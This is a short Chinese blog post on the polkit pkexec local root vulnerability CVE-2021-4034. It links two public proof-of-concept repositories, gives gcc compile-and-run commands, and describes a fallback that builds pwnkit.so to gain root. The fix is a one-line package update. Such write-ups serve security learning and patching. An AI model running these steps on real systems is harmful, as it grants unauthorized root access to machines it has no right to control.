美文网首页
polkit pkexec 本地提权漏洞(CVE-2021-40

polkit pkexec 本地提权漏洞(CVE-2021-40

作者: migrate_ | 来源:发表于2022-05-31 15:38 被阅读0次

遵纪守法

任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得危害网络安全,不得利用网络从事危害国家安全、荣誉和利益

漏洞成因

这个漏洞比较nb,现有的所有版本的pkexec都受到影响
polkit是一个授权管理器,其系统架构由授权和身份验证代理组成,pkexec是其中polkit的其中一个工具,他的作用有点类似于sudo,允许用户以另一个用户身份执行命令

exp

https://github.com/arthepsy/CVE-2021-4034
gcc cve-2021-4034-poc.c -o cve-2021-4034-poc
./cve-2021-4034-poc
1.png

万一失败还可以试这一种方法

https://github.com/PwnFunction/CVE-2021-4034

编译pwnkit.so文件

gcc pwnkit.c -o pwnkit.so -shared -fPIC

将此文件复制到exp目录下的pwnkit目录
cve-2021-4034执行失败 会在目录下生成两个文件夹 一个是"GCONV_PATH=" 还有一个是"pwnkit" 把pwnkit文件夹里面pwnkit.c文件拿到本地编译成pwnkit.so 再放入pwnkit文件夹 这个时候再去执行cve-2021-4034 就会提权成功了

修复

yum update polkit

相关文章

  • polkit pkexec 本地提权漏洞(CVE-2021-40

    遵纪守法 任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得危害网络安全,不得利用网络从事危...

  • 2019-08-08

    pr提权 提权利用的漏洞 Microsoft Windows RPCSS服务隔离本地权限提升漏洞 RPCSS服务没...

  • CVE-2019-13272 Linux本地提权漏洞复现

    0x01 相关信息 漏洞类型:Linux本地提权漏洞影响范围:Linux内核版本低于5.1.17测试主机信息: E...

  • 趋势科技缓冲区溢出权限逃逸漏洞

    CVE-2018-6232这个漏洞允许本地攻击者通过有漏洞的趋势科技软件提权。为了利用该漏洞,攻击者首先得做到能在...

  • 17.提权

    提权方法:溢出漏洞提权、数据库提权(mysql提权(udf提权,mof提权,自启动提权)、mssql提权)、第三方...

  • CVE-2017-16995:Ubuntu16.04内核4.4.

    影响范围 Ubuntu16.04的4.14-4.4系列内核 该漏洞类型属于本地提权,他人可利用该漏洞将普通用户权限...

  • 提权漏洞

    提权,顾名思义就是提高自己在服务器中的权限,就比如在 Windows 中你本身登录的用户是 guest,通过提权后...

  • 宠物小精灵

    时隔十月发布的CVE-2016-5425 Apache Tomcat本地提权漏洞预警不久,近日Apache Tom...

  • Ubuntu 16.04.4本地提权漏洞

    POC下载地址 密码: rq64 修复方案目前暂未有明确的补丁升级方案。 建议用户在评估风险后,通过修改内核参数限...

  • Linux Sudo本地提权漏洞安全风险

    2021年02月04日,国外研究团队发现Sudo堆溢出漏洞(CVE-2021-3156),漏洞隐藏十年之久,成功利...

网友评论

      本文标题:polkit pkexec 本地提权漏洞(CVE-2021-40

      本文链接:https://www.haomeiwen.com/subject/qzpzprtx.html